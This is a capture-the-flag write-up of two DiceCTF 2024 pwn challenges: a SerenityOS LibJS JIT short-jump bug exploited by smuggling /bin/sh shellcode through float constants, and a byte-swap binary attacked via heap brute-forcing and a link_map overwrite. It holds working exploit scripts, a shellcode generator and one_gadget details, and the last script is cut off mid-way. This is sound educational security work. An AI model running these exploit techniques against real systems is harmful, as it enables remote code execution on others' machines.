Contents

DiceCTF 2024 Quals

https://i.imgur.com/llysqqr.png
DiceCTF 2024 Quals. We secured the first place

I played with the Blue Water team in the DiceCTF 2024 Quals. We managed to secure the first place. A huge shoutout and thanks to my awesome teammates for their fantastic teamwork during it!

Below is the writeup for the pwn challenges that I managed to solve.

Pwn

hop

Description

Using 32 bits to encode a short jump is so wasteful… this will surely be better🐞🤓

nc mc.ax 32421

Initial Analysis

In this challenge, we were provided with a zip file containing the Dockerfile used to build the challenge, along with a patch file. Below is the content of the patch file.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Base: https://github.com/SerenityOS/serenity/tree/fbde901614368dcf03d4a8eee800d8b89131465f

diff --git a/Userland/Libraries/LibJIT/X86_64/Assembler.h b/Userland/Libraries/LibJIT/X86_64/Assembler.h
index 79b96cf81f..465c4cb38c 100644
--- a/Userland/Libraries/LibJIT/X86_64/Assembler.h
+++ b/Userland/Libraries/LibJIT/X86_64/Assembler.h
@@ -472,12 +472,23 @@ struct X86_64Assembler {
     private:
         void link_jump(X86_64Assembler& assembler, size_t offset_in_instruction_stream)
         {
-            auto offset = offset_of_label_in_instruction_stream.value() - offset_in_instruction_stream;
+            auto offset = static_cast<ssize_t>(offset_of_label_in_instruction_stream.value() - offset_in_instruction_stream);
             auto jump_slot = offset_in_instruction_stream - 4;
-            assembler.m_output[jump_slot + 0] = (offset >> 0) & 0xff;
-            assembler.m_output[jump_slot + 1] = (offset >> 8) & 0xff;
-            assembler.m_output[jump_slot + 2] = (offset >> 16) & 0xff;
-            assembler.m_output[jump_slot + 3] = (offset >> 24) & 0xff;
+            if (offset <= INT8_MAX && offset >= INT8_MIN && assembler.m_output[jump_slot - 1] == 0xE9) {
+                auto small_offset = static_cast<int8_t>(offset + 3);
+                // JMP rel8
+                assembler.m_output[jump_slot - 1] = 0xEB;
+                assembler.m_output[jump_slot + 0] = small_offset;
+                // NOP3_OVERRIDE_NOP
+                assembler.m_output[jump_slot + 1] = 0x0F;
+                assembler.m_output[jump_slot + 2] = 0x1F;
+                assembler.m_output[jump_slot + 3] = 0x00;
+            } else {
+                assembler.m_output[jump_slot + 0] = (offset >> 0) & 0xff;
+                assembler.m_output[jump_slot + 1] = (offset >> 8) & 0xff;
+                assembler.m_output[jump_slot + 2] = (offset >> 16) & 0xff;
+                assembler.m_output[jump_slot + 3] = (offset >> 24) & 0xff;
+            }
         }
     };

The patch targets the JIT (Just-In-Time compilation) code of LibJS in SerenityOS. Examining the patch reveals a significant bug. The intention behind the patch is to replace a relative JMP offset instruction with a relative JMP short offset. However, an issue arises in how the small_offset is calculated. By adding 3 to the offset and then casting it to int8_t, if the result of offset + 3 exceeds INT8_MAX, it leads to an overflow, resulting in a negative offset. Consequently, the JIT-compiled code behaves incorrectly. Instead of jumping forward to the intended destination, the overflow causes a jump to a preceding instruction, disrupting the intended flow of execution.

Solution

Based on the bug we identified, let’s start by setting up our local environment. The first step involves cloning the SerenityOS repository and applying the patch.

1
2
3
4
git clone https://github.com/SerenityOS/serenity/
cd serenity
git checkout fbde901614368dcf03d4a8eee800d8b89131465f
git apply ../patch

Before proceeding to build the js engine, a small adjustment will simplify our debugging process. Navigate to the serenity/Userland/Libraries/LibJS/JIT/Compiler.cpp file and modify the DUMP_JIT_DISASSEMBLY value to 1. This adjustment ensures that whenever we execute JavaScript code using the js engine that triggers JIT compilation, the engine will automatically dump the disassembly of the JIT-compiled code. With this setting enabled, we are now ready to proceed with building the js engine.

1
./Meta/serenity.sh build lagom js

First, we’ll begin by crafting a simple script to examine the JIT-compiled code’s behavior.

1
2
3
4
5
6
7
8
function test() {
    if (1 === 1) {
        return 41414141
    }
    return [42424242];
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World");
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
Block 2:
2:0 LoadImmediate undefined:
0x00007fc11cc5c266  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007fc11cc5c26d  00 fe 7f
0x00007fc11cc5c270  49 89 c4              mov    r12,rax
2:20 LoadImmediate 41414141:
0x00007fc11cc5c273  48 b8 fd ed 77 02 00  mov    rax, 0x7ffa00000277edfd
0x00007fc11cc5c27a  00 fa 7f
0x00007fc11cc5c27d  49 89 c4              mov    r12,rax
2:40 Return:
0x00007fc11cc5c280  4c 89 e0              mov    rax,r12
0x00007fc11cc5c283  48 89 43 20           mov    [rbx+0x20],rax
0x00007fc11cc5c287  eb 47                 jmp    short 1cc5c2d0 <common_exit>
0x00007fc11cc5c289  0f 1f 00              nop    [rax]

Block 3:
3:0 LoadImmediate undefined:
0x00007fc11cc5c28c  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007fc11cc5c293  00 fe 7f
0x00007fc11cc5c296  49 89 c4              mov    r12,rax
3:20 Jump @4:
0x00007fc11cc5c299  eb 03                 jmp    short 1cc5c29e <Block 4>
0x00007fc11cc5c29b  0f 1f 00              nop    [rax]

Block 4:
4:0 NewPrimitiveArray [ 42424242 ]:
0x00007fc11cc5c29e  48 be 48 2c 81 b6 5f  mov    rsi, 0x0000555fb6812c48
0x00007fc11cc5c2a5  55 00 00
0x00007fc11cc5c2a8  ba 01 00 00 00        mov    edx, 0x00000001
0x00007fc11cc5c2ad  57                    push   rdi
0x00007fc11cc5c2ae  6a 00                 push   0x00
0x00007fc11cc5c2b0  48 b8 d0 37 0a 1d c1  mov    rax, 0x00007fc11d0a37d0
0x00007fc11cc5c2b7  7f 00 00
0x00007fc11cc5c2ba  ff d0                 call   eax
0x00007fc11cc5c2bc  48 83 c4 08           add    rsp,0x08
0x00007fc11cc5c2c0  5f                    pop    rdi
0x00007fc11cc5c2c1  49 89 c4              mov    r12,rax
4:20 Return:
0x00007fc11cc5c2c4  4c 89 e0              mov    rax,r12
0x00007fc11cc5c2c7  48 89 43 20           mov    [rbx+0x20],rax
0x00007fc11cc5c2cb  eb 03                 jmp    short 1cc5c2d0 <common_exit>
0x00007fc11cc5c2cd  0f 1f 00              nop    [rax]
common_exit:
0x00007fc11cc5c2d0  4c 89 23              mov    [rbx],r12
0x00007fc11cc5c2d3  41 5f                 pop    r15
0x00007fc11cc5c2d5  41 5e                 pop    r14
0x00007fc11cc5c2d7  41 5d                 pop    r13
0x00007fc11cc5c2d9  41 5c                 pop    r12
0x00007fc11cc5c2db  5b                    pop    rbx
0x00007fc11cc5c2dc  5b                    pop    rbx
0x00007fc11cc5c2dd  c9                    leave
0x00007fc11cc5c2de  c3                    ret

Upon analyzing the dumped results, we notice that each return statement triggers a relative JMP instruction to common_exit, which the patch then converts into a jmp short. Observing the disassembly, our goal becomes clear: to extend the jmp short offset when returning 41414141. The presence of return [42424242] in the JIT-compiled code, as mentioned above, indicates that to enlarge the jmp short offset for returning 41414141, we can simply incorporate multiple values to be returned in that line. For instance, altering the script as follows increases the offset.

1
2
3
4
5
6
7
8
function test() {
    if (1 === 1) {
        return 41414141
    }
    return [42424242], 43434343;
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World");
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
Block 2:
2:0 LoadImmediate undefined:
0x00007f4c10fac266  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007f4c10fac26d  00 fe 7f
0x00007f4c10fac270  49 89 c4              mov    r12,rax
2:20 LoadImmediate 41414141:
0x00007f4c10fac273  48 b8 fd ed 77 02 00  mov    rax, 0x7ffa00000277edfd
0x00007f4c10fac27a  00 fa 7f
0x00007f4c10fac27d  49 89 c4              mov    r12,rax
2:40 Return:
0x00007f4c10fac280  4c 89 e0              mov    rax,r12
0x00007f4c10fac283  48 89 43 20           mov    [rbx+0x20],rax
0x00007f4c10fac287  eb 54                 jmp    short 10fac2dd <common_exit> <- TARGET
0x00007f4c10fac289  0f 1f 00              nop    [rax]

Block 3:
3:0 LoadImmediate undefined:
0x00007f4c10fac28c  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007f4c10fac293  00 fe 7f
0x00007f4c10fac296  49 89 c4              mov    r12,rax
3:20 Jump @4:
0x00007f4c10fac299  eb 03                 jmp    short 10fac29e <Block 4>
0x00007f4c10fac29b  0f 1f 00              nop    [rax]

Block 4:
4:0 NewPrimitiveArray [ 42424242 ]:
0x00007f4c10fac29e  48 be 68 0c ff e2 da  mov    rsi, 0x000055dae2ff0c68
0x00007f4c10fac2a5  55 00 00
0x00007f4c10fac2a8  ba 01 00 00 00        mov    edx, 0x00000001
0x00007f4c10fac2ad  57                    push   rdi
0x00007f4c10fac2ae  6a 00                 push   0x00
0x00007f4c10fac2b0  48 b8 d0 37 6a 11 4c  mov    rax, 0x00007f4c116a37d0
0x00007f4c10fac2b7  7f 00 00
0x00007f4c10fac2ba  ff d0                 call   eax
0x00007f4c10fac2bc  48 83 c4 08           add    rsp,0x08
0x00007f4c10fac2c0  5f                    pop    rdi
0x00007f4c10fac2c1  49 89 c4              mov    r12,rax
4:20 LoadImmediate 43434343:
0x00007f4c10fac2c4  48 b8 67 c1 96 02 00  mov    rax, 0x7ffa00000296c167
0x00007f4c10fac2cb  00 fa 7f
0x00007f4c10fac2ce  49 89 c4              mov    r12,rax
4:40 Return:
0x00007f4c10fac2d1  4c 89 e0              mov    rax,r12
0x00007f4c10fac2d4  48 89 43 20           mov    [rbx+0x20],rax
0x00007f4c10fac2d8  eb 03                 jmp    short 10fac2dd <common_exit>
0x00007f4c10fac2da  0f 1f 00              nop    [rax]
common_exit:
0x00007f4c10fac2dd  4c 89 23              mov    [rbx],r12
0x00007f4c10fac2e0  41 5f                 pop    r15
0x00007f4c10fac2e2  41 5e                 pop    r14
0x00007f4c10fac2e4  41 5d                 pop    r13
0x00007f4c10fac2e6  41 5c                 pop    r12
0x00007f4c10fac2e8  5b                    pop    rbx
0x00007f4c10fac2e9  5b                    pop    rbx
0x00007f4c10fac2ea  c9                    leave
0x00007f4c10fac2eb  c3                    ret

The offset increment by 0xd upon adding a new constant value to be returned demonstrates a potential approach to exploit the bug. By experimenting with various patterns, I discovered a specific code snippet that successfully triggers the bug.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
function test() {
    if (1 === 1) {
        if (2 === 3) {
            return 0, 1, 2, 3, 4, 5;
        };
    }
    return [4141414141];
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World");

Here is the disassembly following our adjustments:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
Block 4:
4:0 NewPrimitiveArray [ 4141414141 ]:
0x00007f52f0c364c6  48 be b8 51 dc c4 e5  mov    rsi, 0x000055e5c4dc51b8
0x00007f52f0c364cd  55 00 00
0x00007f52f0c364d0  ba 01 00 00 00        mov    edx, 0x00000001
0x00007f52f0c364d5  57                    push   rdi
0x00007f52f0c364d6  6a 00                 push   0x00
0x00007f52f0c364d8  48 b8 d0 37 4a f1 52  mov    rax, 0x00007f52f14a37d0
0x00007f52f0c364df  7f 00 00
0x00007f52f0c364e2  ff d0                 call   eax
0x00007f52f0c364e4  48 83 c4 08           add    rsp,0x08
0x00007f52f0c364e8  5f                    pop    rdi
0x00007f52f0c364e9  49 89 c4              mov    r12,rax
4:20 Return:
0x00007f52f0c364ec  4c 89 e0              mov    rax,r12
0x00007f52f0c364ef  48 89 43 20           mov    [rbx+0x20],rax
0x00007f52f0c364f3  eb 81                 jmp    short f0c36476 <2:a0+0x31>
0x00007f52f0c364f5  0f 1f 00              nop    [rax]

Block 5:
5:0 LoadImmediate undefined:
0x00007f52f0c364f8  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007f52f0c364ff  00 fe 7f
0x00007f52f0c36502  49 89 c4              mov    r12,rax
5:20 LoadImmediate 0:
0x00007f52f0c36505  48 b8 00 00 00 00 00  mov    rax, 0x7ffa000000000000
0x00007f52f0c3650c  00 fa 7f
0x00007f52f0c3650f  49 89 c4              mov    r12,rax
5:40 LoadImmediate 1:
0x00007f52f0c36512  48 b8 01 00 00 00 00  mov    rax, 0x7ffa000000000001
0x00007f52f0c36519  00 fa 7f
0x00007f52f0c3651c  49 89 c4              mov    r12,rax
5:60 LoadImmediate 2:
0x00007f52f0c3651f  48 b8 02 00 00 00 00  mov    rax, 0x7ffa000000000002
0x00007f52f0c36526  00 fa 7f
0x00007f52f0c36529  49 89 c4              mov    r12,rax
5:80 LoadImmediate 3:
0x00007f52f0c3652c  48 b8 03 00 00 00 00  mov    rax, 0x7ffa000000000003
0x00007f52f0c36533  00 fa 7f
0x00007f52f0c36536  49 89 c4              mov    r12,rax
5:a0 LoadImmediate 4:
0x00007f52f0c36539  48 b8 04 00 00 00 00  mov    rax, 0x7ffa000000000004
0x00007f52f0c36540  00 fa 7f
0x00007f52f0c36543  49 89 c4              mov    r12,rax
5:c0 LoadImmediate 5:
0x00007f52f0c36546  48 b8 05 00 00 00 00  mov    rax, 0x7ffa000000000005
0x00007f52f0c3654d  00 fa 7f
0x00007f52f0c36550  49 89 c4              mov    r12,rax
5:e0 Return:
0x00007f52f0c36553  4c 89 e0              mov    rax,r12
0x00007f52f0c36556  48 89 43 20           mov    [rbx+0x20],rax
0x00007f52f0c3655a  eb 1a                 jmp    short f0c36576 <common_exit>
0x00007f52f0c3655c  0f 1f 00              nop    [rax]

Block 6:
6:0 LoadImmediate undefined:
0x00007f52f0c3655f  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007f52f0c36566  00 fe 7f
0x00007f52f0c36569  49 89 c4              mov    r12,rax
6:20 Jump @7:
0x00007f52f0c3656c  eb 03                 jmp    short f0c36571 <Block 7>
0x00007f52f0c3656e  0f 1f 00              nop    [rax]

Block 7:
7:0 Jump @4:
0x00007f52f0c36571  e9 50 ff ff ff        jmp    f0c364c6 <Block 4>
common_exit:
0x00007f52f0c36576  4c 89 23              mov    [rbx],r12
0x00007f52f0c36579  41 5f                 pop    r15
0x00007f52f0c3657b  41 5e                 pop    r14
0x00007f52f0c3657d  41 5d                 pop    r13
0x00007f52f0c3657f  41 5c                 pop    r12
0x00007f52f0c36581  5b                    pop    rbx
0x00007f52f0c36582  5b                    pop    rbx
0x00007f52f0c36583  c9                    leave
0x00007f52f0c36584  c3                    ret

Upon closer examination, we observed that during the process of returning [41414141], the jmp short instruction becomes corrupted, transforming into jmp short 0x81. This alteration causes the instruction to jump backward. The objective now shifts to adjusting our POC, aiming to redirect the corrupted jmp rel8 destination to a segment of bytecode under our control. The following JavaScript code achieves this by successfully setting the jump destination to bytecode we manipulate.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
function test() {
    if (1 === 3) {
        if (2 === 3) {
            return 0, 1, 2, 3, 4, 5;
        };
    }
    return 2261634.5098039214 ,2261634.5098039214,{},[4444],[5555];
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World")
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
Block 4:
4:0 LoadImmediate 2261634.5098039214:
0x00007f7617c494c6  48 b8 41 41 41 41 41  mov    rax, 0x4141414141414141
0x00007f7617c494cd  41 41 41
0x00007f7617c494d0  49 89 c4              mov    r12,rax
...
...
...
4:98 Return:
0x00007f47048d8543  4c 89 e0              mov    rax,r12
0x00007f47048d8546  48 89 43 20           mov    [rbx+0x20],rax
0x00007f47048d854a  eb 81                 jmp    short 48d84cd <Block 4+0x7>
0x00007f47048d854c  0f 1f 00              nop    [rax]

Notably, the <Block 4+0x7> falls under our control, as it represents part of the hexadecimal encoding of our floating-point parameter (2261634.5098039214, which translates to 0x4141414141414141). We can smuggle our shellcode into the JIT-compiled code. By making the return statement to include additional values that represent our shellcode in floating-point format, we can effectively insert executable code into the JIT process.

What I did here involves smuggling shellcode by appending additional values to the return statement. Specifically, within the <Block 4+0x7>, I did another backward jump that directs execution to the previously smuggled shellcode. For the creation of this smuggled shellcode, I used the script detailed below:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# Taken from https://ctftime.org/writeup/29915
from pwn import *
import struct
context.arch = "amd64"

instructions = [
"mov ebx, 0x0068732f",
"shl rbx, 32",
"mov edx, 0x6e69622f",
"add rbx, rdx",
"push rbx",
"xor eax, eax",
"mov al, 0x3b",
"mov rdi, rsp",
"xor edx, edx",
"xor rsi, rsi",
"syscall"
]

# Marker constant
buf = [b""]
bytecode = [asm(i) for i in instructions]
jmp = asm("jmp $+7")
for i in bytecode:
    if len(buf[-1] + i) > 6:
        buf[-1] = buf[-1].ljust(6, b"\x90") + jmp
        buf.append(i)
    else:
        buf[-1] += i
buf[-1] = buf[-1].ljust(7, b"\x90")+b'\x41' # Prevent our floating point has negative number

for i,v in zip(instructions, bytecode):
    print(i, v)

return_statement = 'return '
for i, n in enumerate(buf):
    if len(n) > 8:
        print(f"ERROR: CHUNK {i} TOO LONG")
        print(disasm(n))
        exit()
    f = struct.unpack("d", n)[0]
    return_statement += f'{f}, '

jmp_backward = struct.unpack("d", b'aaaaa'+asm(f"jmp ${-7-13*(len(buf)-1)-11}")+b'a')[0]
return_statement += f'{jmp_backward}, ' # another backward jump to the starting of our smuggled shellcode
return_statement += '2261634.5098039214,{},[4444],[5555];' # padding
print(return_statement)

Following the shellcode generation, we just need to put the generated return statement to our previous POC:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
function test() {
    if (1 === 3) {
        if (2 === 3) {
            return 0, 1, 2, 3, 4, 5;
        };
    }
    return 3.7960572222424763e-280, 3.7963592540881645e-280, 3.796288397419065e-280, 3.8219835402295355e-280, 3.7965429435410983e-280, 3.7965737440041074e-280, 69477412.1406443, 1.7387995134439084e+162, 2261634.5098039214,{},[4444],[5555];
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World")

We just need to send the above script to the remote with below script, and we will get a shell!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
from pwn import *

r = remote('mc.ax', 32421)

poc = open('./example.js', 'rb').readlines()
r.recvuntil(b"'EOF'")
for line in poc:
    r.sendline(line.strip())
r.sendline(b'EOF')
r.interactive()

I got second blood in this challenge :)

Flag: dice{hop_skip_shortjmp}

boogie-woogie

Description

i’ve been watching too much jjk due to super bruteforce, we are forced to add POW. this is why we can’t have nice things

nc mc.ax 31040

Initial Analysis

For this challenge, we were presented with a binary named boogie-woogie. The initial step involved examining the binary’s mitigations.

1
2
3
4
5
6
╰─❯ checksec boogie-woogie
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

All protections were found to be active. Now, it’s time to check the disassembly of the important functions: main

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [rsp+8h] [rbp-18h] BYREF
  __int64 v5; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  puts(_art);
  puts(s);
  while ( data[0] )
  {
    v5 = 0LL;
    printf("\n\x1B[31;49;1;4m%s\x1B[0m\n\n\n", data);
    puts(
      "The sound of \x1B[0;33mgion shoja bells\x1B[0m echoes the impermanence of all things. The color\n"
      "of \x1B[0;33msala flowers\x1B[0m reveals the truth that the prosperous must decline. \x1B[4;33mHowever\x1B[0m! We\n"
      "are the exception:");
    __isoc99_scanf("%zu %zu", &v4, &v5);
    clap(v4, v5);
  }
  return 0;
}

clap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
char *__fastcall clap(__int64 a1, __int64 a2)
{
  char *result; // rax

  data[a1] ^= data[a2];
  data[a2] ^= data[a1];
  result = &data[a1];
  data[a1] ^= data[a2];
  return result;
}

The binary’s structure is straightforward. Essentially, it allows for the swapping of bytes within any rw (read-write) area of the binary, specifically relative to the bss section (where data is stored). This byte-swapping capability is the sole interaction allowed, and the program terminates if the value at data[0] is set to NULL.

Solution

Despite the binary’s simplicity, crafting an exploit poses a significant challenge.

Brute-force heap offset

Initially, we can leak any value if we know its offset relative to the data, by exchanging the target_offset with 0x96. The value 0x96 represents the final byte in the data string, indicating that swapping and moving our target value to data[0x96] will result in its display on the prompt.

The primary challenge arises from the fact that the bss area lacks valuable information for leakage, except for the PIE base address. This limitation prompts the exploration of alternative strategies, such as attempting to brute-force the heap offset. Notably, if a viable offset within the heap can be identified, it becomes feasible to trace back to the heap’s top chunk, and we can do more with it later on.

Is brute-forcing the heap offset a feasible strategy? Indeed, it is. Typically, the heap spans an area of 0x21000. Observations indicate that the gap between the bss and heap areas ranges from approximately 0x0XXY000 to 0x1XXY000. Given the heap’s default size exceeds 0x10000, correctly deducing the XX nibble ensures that any Y nibble exist, thus significantly reducing the brute-force effort to roughly 8 bits. This reduction means that the brute-force approach is quite practical.

Leak libc address

Let say that we are abole to brute-force the heap offset and identifying the top chunk, the next question is: what possibilities does this open up? A close examination of the heap chunks in gdb reveals the default layout.

1
2
3
4
Chunk(addr = 0x555555564000 , size=0x290, flags=PREV_INUSE)
Chunk(addr = 0x555555564290 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x5555555646a0 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x555555564ab0 , size=0x20550, flags=PREV_INUSE)  <-  top

Unfortunately, it does not contain any directly useful values for leakage. However, an intriguing opportunity arises with the potential to corrupt the top chunk size.

Now, consider the scenario where the top chunk size is altered from 0x20550 to merely 0x550 with the swap. It’s observed that triggering a malloc(0x800) call is straightforward via scanf, especially by prefixing our inputted number with numerous leading zeros. What implications would this manipulation have when combined with a malloc(0x800) call triggered by scanf?

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
--- BEFORE SCANF (CORRUPTED TOP CHUNK)
gef> heap chunks
Chunk(addr = 0x555555564000 , size=0x290, flags=PREV_INUSE)
Chunk(addr = 0x555555564290 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x5555555646a0 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x555555564ab0 , size=0x550, flags=PREV_INUSE)  <-  top

--- AFTER SCANF
gef> heap chunks
Chunk(addr = 0x555555564000 , size=0x290, flags=PREV_INUSE)
Chunk(addr = 0x555555564290 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x5555555646a0 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x555555564ab0 , size=0x530, flags=PREV_INUSE, fd=0x7ffff7e1ace0, bk=0x7ffff7e1ace0)  <-  unsortedbins[1/1]
Chunk(addr = 0x555555564fe0 , size=0x10, flags=)
Chunk(addr = 0x555555564ff0 , size=0x10, flags=PREV_INUSE)

Upon inspecting the heap’s state in gdb following our manipulation, we observe the presence of an unsorted bin chunk. This opens the door to leaking a libc address. Having the libc address leads to several exploitation pathways.

In our approach, we opted for the link_map exploitation technique, as detailed in nobodyisnobody’s article. To effectively trigger the code outlined in glibc’s dl-fini.c, a series of steps are required:

  • Nullify the link_map->DT_FINI_ARRAY.
  • Overwrite link_map->l_info[DT_FINI] with an address we control, allowing us to modify the d_un.d_ptr value subsequently.
  • Adjust link_map->l_Addr and link_map->l_info[DT_FINI]->d_un.d_ptr so the sum of their values will point to our desired function address.
  • Trigger exit.

Exploring the possibilities with one_gadget, we identified one good gadget.

1
2
3
4
5
0xebc85 execve("/bin/sh", r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL
  [rdx] == NULL || rdx == NULL

The next step involves placing the one_gadget address into the link_map. However, it’s important to remember that our ability to write is constrained to swapping bytes. Given this limitation, how can we insert the one_gadget address into the link_map?

A reliable method involves leaking the stack address, then positioning our targeted bytes on the stack through scanf, followed by swapping them into place. However, we discovered this trick quite late in the process and had already secured the flag using our initial approach, which we will outline here.

The one_gadget address consists of 6 bytes, and the higher 3 bytes can be easily written by sourcing them from the libc GOT area. We simply select any libc address present there whose higher 3 bytes match those of our chosen one_gadget across multiple runs.

The 1st lower byte of the one_gadget address is consistently 0x85. Upon examining the memory, we discovered a value within the ld rw area that invariably contains the 0x85 byte.

Regarding the 2nd lower byte of the one_gadget, it is influenced by ASLR. Nonetheless, a thorough memory scan revealed a value in the ld rw area that consistently matches the 2nd lower byte of the one_gadget address across multiple executions.

Unfortunately, for the 3rd lower byte, there is no address that consistently mirrors the one_gadget’s 3rd lower byte. Therefore, we relied on luck :), scanning the ld memory with the swap function in each run, hoping to find a byte in the ld area that could match the 3rd lower byte.

Brute-forcing the heap is took some quite time, and every time we hit it, sometime we failed to find the 3rd byte in the ld area due to the timeout. However, we hit once and we are able to fetch the flag. Below is our full script with detailed comments:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
from pwn import *

# Filter ld area to be scanned. Skip addresses that always
# contains zero bytes. `out` file example
'''
0x7ff7628f0000:	0x0000000000039e80	0x0000000000000000
0x7ff7628f0010:	0x0000000000000000	0x00007ff7627fda10
0x7ff7628f0020 <_dl_signal_exception@got.plt>:	0x00007ff7627fd960	0x00007ff7627fd9b0
0x7ff7628f0030 <_dl_catch_error@got.plt>:	0x00007ff7627fdb30	0x0000000000000000
0x7ff7628f0040 <_rtld_global>:	0x00007ff7628f12e0	0x0000000000000004
0x7ff7628f0050 <_rtld_global+16>:	0x00007ff7628f15a0	0x0000000000000000
...
'''
lines = open('out', 'rb').readlines()
ld_rw_base = 0x00007ff7628f0000
map_offset = {}
rev_map = {}
for line in lines:
    addr = line.split(b'<')[0].split(b':\t')[0]
    offset = int(addr, 16) - ld_rw_base
    val_1 = int(line.split(b'\t')[1], 16)
    for idx, val in enumerate(p64(val_1)):
        if val != 0:
            rev_map[val] = 1
            map_offset[offset+idx] = val
    offset += 8
    val_2 = int(line.split(b'\t')[2], 16)
    for idx, val in enumerate(p64(val_2)):
        if val != 0:
            rev_map[val] = 1
            map_offset[offset+idx] = val

context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
warnings.simplefilter("ignore")

local_url = "localhost"
local_port = 5000
remote_url = "mc.ax"
remote_port = 31040
gdbscript = '''
'''

def conn():
    if args.LOCAL:
        r = remote(local_url, local_port)
    else:
        r = remote(remote_url, remote_port)

    return r

# Brute-force heap offset
num_try = -1
while True:
    num_try += 1
    print(f'{num_try = }')
    found = False
    try:
        r = conn()

        # POW solver
        if not args.LOCAL:
            r.recvuntil(b'work:\n')
            out = r.recvline().strip()
            proof = os.popen(out.decode()).readlines()[0].strip()
            r.sendlineafter(b'solution: ', proof.encode())

        def clap(v1,v2):
            r.sendlineafter(b'on:', (str(v1)+' '+str(v2)).encode())

        def clap_str(v1,v2):
            r.sendlineafter(b'on:', (v1+' '+v2).encode())

        def clap_bytes(v1,v2):
            r.sendlineafter(b'on:', (v1+b' '+v2))

        # BRUTEFORCE HEAP OFFSET
        '''
        0x075aa98
        0x0da8a98
        0x1613a98
        0x1eeca98
        '''
        curr_heap_offset = 0x827a98
        leak = 0x1b
        ctr = 0x0

        # Backtrack to find top_chunk, identified by the leak value is 0x51
        # (because top chunk size value is 0x20551)
        while leak == 0x1b:
            curr_heap_offset -= 0x1000
            print('offset = '+hex(curr_heap_offset))
            clap(curr_heap_offset,0x96)
            r.recvuntil('soul!',drop=True)
            leak = u8(r.recv(1))
        print('top_chunk found: '+hex(leak))
        print('at offset = '+hex(curr_heap_offset))
        found = leak == 0x51
    except:
        print(f'Failed...')
        r.close()
        continue
    if found:
        # Restore swapped value so that top chunk size isn't corrupted yet.
        clap(curr_heap_offset,0x96)
        break
    else:
        r.close()
        continue

# PIE Leak
pie_leak=0
for i in range(6):
    clap(-(0x18-i),0x96)
    r.recvuntil('soul!',drop=True)
    pie_leak = pie_leak | ( u8(r.recv(1)) << (i*8) )
    clap(-(0x18-i),-(0x18-i)) # restore original value
info(f'{hex(pie_leak) = }')

# Overwrite top chunk third bytes to 0,
# resulting in top chunk size become 0x551
